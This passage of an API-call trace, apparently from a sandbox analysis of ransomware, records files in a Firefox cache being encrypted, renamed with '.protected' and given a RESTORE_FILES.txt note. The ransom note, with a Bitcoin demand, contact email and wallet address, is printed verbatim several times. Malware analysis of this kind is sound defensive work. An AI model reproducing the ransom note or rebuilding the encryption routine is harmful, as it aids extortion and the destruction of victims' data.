(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0086.357] StrStrW (lpFirst="7E0FEd01", lpSrch=".txt") returned 0x0 [0086.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0086.357] StrStrW (lpFirst="7E0FEd01", lpSrch=".rar") returned 0x0 [0086.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0086.357] StrStrW (lpFirst="7E0FEd01", lpSrch=".zip") returned 0x0 [0086.358] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.359] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.359] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.359] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.359] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.359] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.359] CloseHandle (hObject=0x160) returned 1 [0086.360] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.protected") returned 119 [0086.360] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01.protected")) returned 1 [0086.360] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.360] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.360] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\RESTORE_FILES.txt") returned 118 [0086.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.361] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.361] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.362] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.362] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.362] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.362] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.362] CloseHandle (hObject=0x15c) returned 1 [0086.362] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="Windows") returned -1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="Program Files") returned -1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="Program Files (x86)") returned -1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="$Recycle.bin") returned 1 [0086.362] lstrcmpiW (lpString1="F0", lpString2="System Volume Information") returned -1 [0086.362] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0") returned 100 [0086.362] lstrcmpW (lpString1="F0", lpString2=".") returned 1 [0086.362] lstrcmpW (lpString1="F0", lpString2="..") returned 1 [0086.362] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\*") returned 102 [0086.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.363] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.363] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.363] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.363] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.363] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.363] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\.") returned 102 [0086.363] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.363] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.363] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.363] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.363] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.363] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.363] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.363] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\..") returned 103 [0086.363] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.363] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.363] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="Windows") returned -1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="Program Files") returned -1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="Program Files (x86)") returned -1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="$Recycle.bin") returned 1 [0086.363] lstrcmpiW (lpString1="ECB2Dd01", lpString2="System Volume Information") returned -1 [0086.363] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0086.363] StrStrIW (lpFirst="ECB2Dd01", lpSrch=".protected") returned 0x0 [0086.363] lstrcmpW (lpString1="ECB2Dd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.363] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.364] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0086.364] StrStrW (lpFirst="ECB2Dd01", lpSrch=".txt") returned 0x0 [0086.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0086.364] StrStrW (lpFirst="ECB2Dd01", lpSrch=".rar") returned 0x0 [0086.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0086.364] StrStrW (lpFirst="ECB2Dd01", lpSrch=".zip") returned 0x0 [0086.364] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.393] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.394] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.394] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.394] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.394] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.394] CloseHandle (hObject=0x160) returned 1 [0086.394] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.protected") returned 119 [0086.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01.protected")) returned 1 [0086.395] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.395] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.395] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\RESTORE_FILES.txt") returned 118 [0086.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.396] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.396] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.397] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.397] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.397] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.397] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.397] CloseHandle (hObject=0x15c) returned 1 [0086.397] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.397] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.397] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\RESTORE_FILES.txt") returned 115 [0086.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.397] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.397] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.398] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.398] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.398] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.398] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.398] CloseHandle (hObject=0x158) returned 1 [0086.399] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="Windows") returned -1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="Program Files") returned -1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="Program Files (x86)") returned -1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="$Recycle.bin") returned 1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="System Volume Information") returned -1 [0086.399] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0086.399] StrStrIW (lpFirst="_CACHE_001_", lpSrch=".protected") returned 0x0 [0086.399] lstrcmpW (lpString1="_CACHE_001_", lpString2="RESTORE_FILES.txt") returned -1 [0086.399] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.400] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.400] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 